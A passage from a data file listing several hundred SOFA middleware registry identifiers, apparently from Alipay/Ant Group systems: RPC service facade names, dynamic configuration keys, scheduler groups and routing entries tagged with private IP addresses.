pi.management.rule.ExpressRuleMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.aliedit.AlieditDecryptService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecStrategyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.RepaymentPlanRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:opinioncore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.test.OnlyForTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.72.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.antscheduler.facade.IBatchInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mfinpromo.common.service.facade.api.goldbill.GoldBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.241.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:buservice_process_callback_antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlegalchain.common.service.facade.api.BlockChainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebguardian.common.facade.service.YebSysParamService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.tangula.facade.CirclePersonService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.113.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.business.platform.bindrelation.facade.BindRelationQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.entrancePageStarNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zscale.api.DrmResourceQueryFacade:1.0:instscalecalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.SelectedResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dms.common.service.DmsExperimentService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsLdcManager.abTestLdcEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.isupergwmng:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.common.test.TestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.icrowdservice.facade.profile.ProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.financecore.common.service.facade.api.TransferManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.PointPrizeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:miniprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxlib.core.change.spi.manage.ChangeManageSpi:1.0:infostudio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.api.TestCaseDirectoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.airbops.biz.changemng.drm.ChangemngDrmConfig.groovyFormat2,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mypointsblock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_EXTDATASYNC_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditcore.service.commonbill.PCCCommonBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.changesdk.server.ChangeService:1.0:graycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaypointcust.biz.rpc.benefit.BenefitExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.SpHealthDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbshopdecorate.common.service.facade.kbserv.decorate.PageConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.VoteActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.177.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mshopprod.common.service.allin.facade.KbSideDishApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.PullLogAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finzyprod.facade.repay.api.RepayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromobus.common.service.facade.mangrove.MetaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.gfpayment.PaymentAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:securitydatastudio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:openbizmock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanlend.common.service.facade.api.apply.LendApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.rule.api.RuleOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:fast-server@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtBizProdRegCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.charge.service.facade.ChargeConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.common.service.facade.backend.api.BackendBasicDataFixFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_YUNPUSH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.processmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.biz.service.impl.contentcheck.mock.MockCheckMsgService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.25.204.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_GCT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.ReasonRecomdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tbfcore.facade.function.FunctionInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.buservice:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_172.21.80.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-mitemcenter-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-secuinfos-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobilemock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.126.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iopencore.common.service.facade.scenario.ContractInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkibdeposit.common.service.facade.query.InstCashChangeDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.impl.support.drm.LpAdminDrm.queryTimeZone,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instbill.common.service.facade.model.api.file.ManualBillFileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.openapi.RequestQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.ifundprod.common.service.facade.api.ExchangePayoutRetryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.64.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alideviceinfo.biz.rpc.facade.IotPayBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.afwrobottwa:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:acmantyixin@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.ElasticSwitcher.elasticRuleForLoadTest,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.oyz.core.facade.api.data.TemplateDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.category.facade.CategoryCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditbill.facade.adjust.PcreditAdjustBillDateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.155.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.220.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdeduct.common.service.facade.SignApplyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:insxhbbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.manage.api.BizTransConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmobile.common.service.userhome.MsgBoxMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficcardsp.common.service.facade.TransportSupportServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stocksupervise.common.service.facade.SofitoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insinformcore.common.service.facade.itg.api.ItgInformOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zskynet.facade.logmonitor.service.MonitorResultQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.recommend.OperationSceneItemConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.123.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insmarketingprod.common.service.facade.insmarketingapp.InsMktProdAppPrizeRecommendReceiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaypointmc.common.service.facade.api.card.PointCardBudgetManagerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.pointspool.PointsPoolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_CREDITGOVERNANCE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.71.220#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.TicketConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.service.impl.schedule.InsCommercialTouchTaskDRM.taskErrorDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.coreQualityPlus.common.facade.service.api.DingTalkMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpInsttradeTairRz.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mpromocenter.recruit.extension.service.facade.api.ItemQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpromocore.common.service.backendfacade.api.PrizeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.defin.framework.mychain.pullblock.facade.BlockConsumerService:1.0:logisticsMybankBlockConsumerService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.spi.EbppOrderItemSpi$PreCreateItemProcessor:1.0:pucprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.manage.FpPropertyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemsgprod.common.service.facade.msgconfig.MsgConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:iopenmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayutrprod.common.facade.loadtest.LoadTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.analysis.AnalysisWealthYueMaChangeRecordDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardcore.common.service.facade.mpcard.McardInterestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gclearingcenter.facade.api.ClearingConfigGenerateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.shop.validate.ShopCategoryCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opinioncore.facade.messagereceive.service.InnerMessageReceiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.baymax.maintainess.drm.scheduleParameter.app_finfocore.scanDays,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.PolicyProcessFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkRefererWithParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.243.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mashup:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dmirror:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.queryShopByPidCorePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.240.122#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.thirdparty.ThirdPartyAccountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.admin.service.OperateRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imif.common.service.facade.api.MerchantClassificationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbpdcenter.common.service.salesprod.ProtocolTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.144.150#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_O_ACRMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.177.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.manager.BuEventManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frboss.facade.api.SolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.comment.PraiseQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_AEICORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cap.common.service.CapSessionService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.common.service.facade.api.StaffConfigFacade:1.0:orgStaffConfigFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.RunnablePackageUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.250.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tcc.common.service.facade.api.ThirdPartStandTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.common.service.facade.meta.InfluenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestprod.common.service.facade.api.TestMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.template.PublicMsgTemplateRenderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.169.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antgroup.zmxy.creditacceptance.common.service.facade.CaConfigManagerRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetProjectSupplyPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.orgdecision.AreaInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecashier.service.facade.spi.PaySettingMenuFacade:1.0:mobileic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpaasweb.common.service.facade.replays.UserBehaviorPathFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.common.manage.facade.api.template.ElementDefinitionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.v3.service.facade.api.autopush.AutoPushRecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.common.service.facade.query.BudgetAmountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.developer.RegisterServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antflow.common.service.facade.FlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pointmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.ShopCardService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databizcore.common.service.facade.related.RelatedUserQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afts.common.service.facade.BizPictureConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.conf.NotifyContextFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:isasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP-F-MOBILEPM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S_riskmodelcentermeta_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paydecision.service.manage.api.PaydecisionManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.nlp.NlpMngservice:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charge.service.facade.ChargeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.remit.RemitCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:dchainassetreg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.common.service.facade.LoadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.comment.ReplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:zmcreditmng_service_check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.GrpCampTemplateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.menu.api.MenuConfigOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.sign.InstSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.bizservice.facade.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.inclusionconf.facade.service.ticket.PaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.CampLabelService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenemng.common.service.facade.api.PageMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.234.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.ebppgw.InstKeyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.PromoDecisionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.util.cache.CacheManager:1.0:commonTbaseGzoneCacheService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.metadata.common.logic.facade.api.LogicalTableMetaService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.biz.overview.manager.OverviewManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.RuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.operator.AloneOperatorQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.64.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finslip:name=com.alipay.finsupport.component.cache.ctrldata.drm.CacheSwitchDRM.autoCacheCompareDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:morderprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.comon.service.facade.rate.RateResultPageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.namelist.GreyListService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.loadbalancer.ListenerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:uniontrade@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.77.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.bizprod.common.service.facade.api.DeviceBindingConfirmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.225#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dss.endpoint.plugin.openapi.SubscriptionOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cloudbox.facade.api.request.RequestUniformCallbackFacade:1.0:fabricproxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.certifymng:name=com.alipay.rule.core.publish.drm.RulePublishResource.threadConfigurations,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininflux.common.service.facade.influx.InfluxSettleRequestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.intelligence.service.IntelligenceMaterialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.PublicEventProcessFacade:1.0:mobilebill_menu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.closeInventoryByRybCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.paymentmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DR